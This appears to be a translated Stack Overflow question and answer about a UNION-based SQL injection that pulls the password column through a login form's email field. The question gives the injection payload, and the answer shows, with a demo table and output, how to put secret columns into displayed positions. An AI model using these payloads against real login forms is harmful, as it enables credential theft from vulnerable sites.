我执行此sql查询是为了返回具有另一个名称的password列。
SELECT * FROM
login
where email = '1' or '1' = '1'
union
select password as foo, null as col, null as col,
null as col, null as col, null as col,
null as col,null as col,null as col,
null as col,null as col,null as col,
null as col,null as col,null as col,
null as col,null as col,null as col
from login
此查询不返回任何foo列。有什么问题吗?
编辑:我想通过电子邮件注入一个表格。我想打印密码为"foo“替换(post) "Select * from login where email = $POST”
发布于 2019-03-04 03:05:11
这是因为您正在执行SELECT * ... UNION
,因此不能在联合中重新定义别名。
模式(MySQL v5.7)
create table test
(
id int,
datas varchar(255)
);
INSERT INTO test VALUES (1, "foo"), (2, "bar");
查询#1
SELECT *
FROM test
UNION
SELECT id AS toto, -- toto alias won't be used, the col name was defined in select *
NULL AS lol -- same than above
FROM test;
输出检查字段名称
| id | datas |
| --- | ----- |
| 1 | foo |
| 2 | bar |
| 1 | |
| 2 | |
由于不能重命名UNION中的列,因此仍然可以猜测列的顺序,并尝试在正确的位置获取数据(在显示的位置获取秘密数据)
模式(MySQL v5.7)
create table test
(
id int,
DisplayedDatas varchar(255),
SecretDatas varchar(255)
);
INSERT INTO test VALUES (1, "foo", "password1"), (2, "bar", "password2");
查询#1
SELECT *
FROM test
WHERE DisplayedDatas = '1' or '1' = '1'
UNION
SELECT NULL, SecretDatas, NULL
FROM test;
输出
| id | DisplayedDatas | SecretDatas |
| --- | -------------- | ----------- |
| 1 | foo | password1 |
| 2 | bar | password2 |
| | password1 | |
| | password2 | |
https://stackoverflow.com/questions/54972546
复制相似问题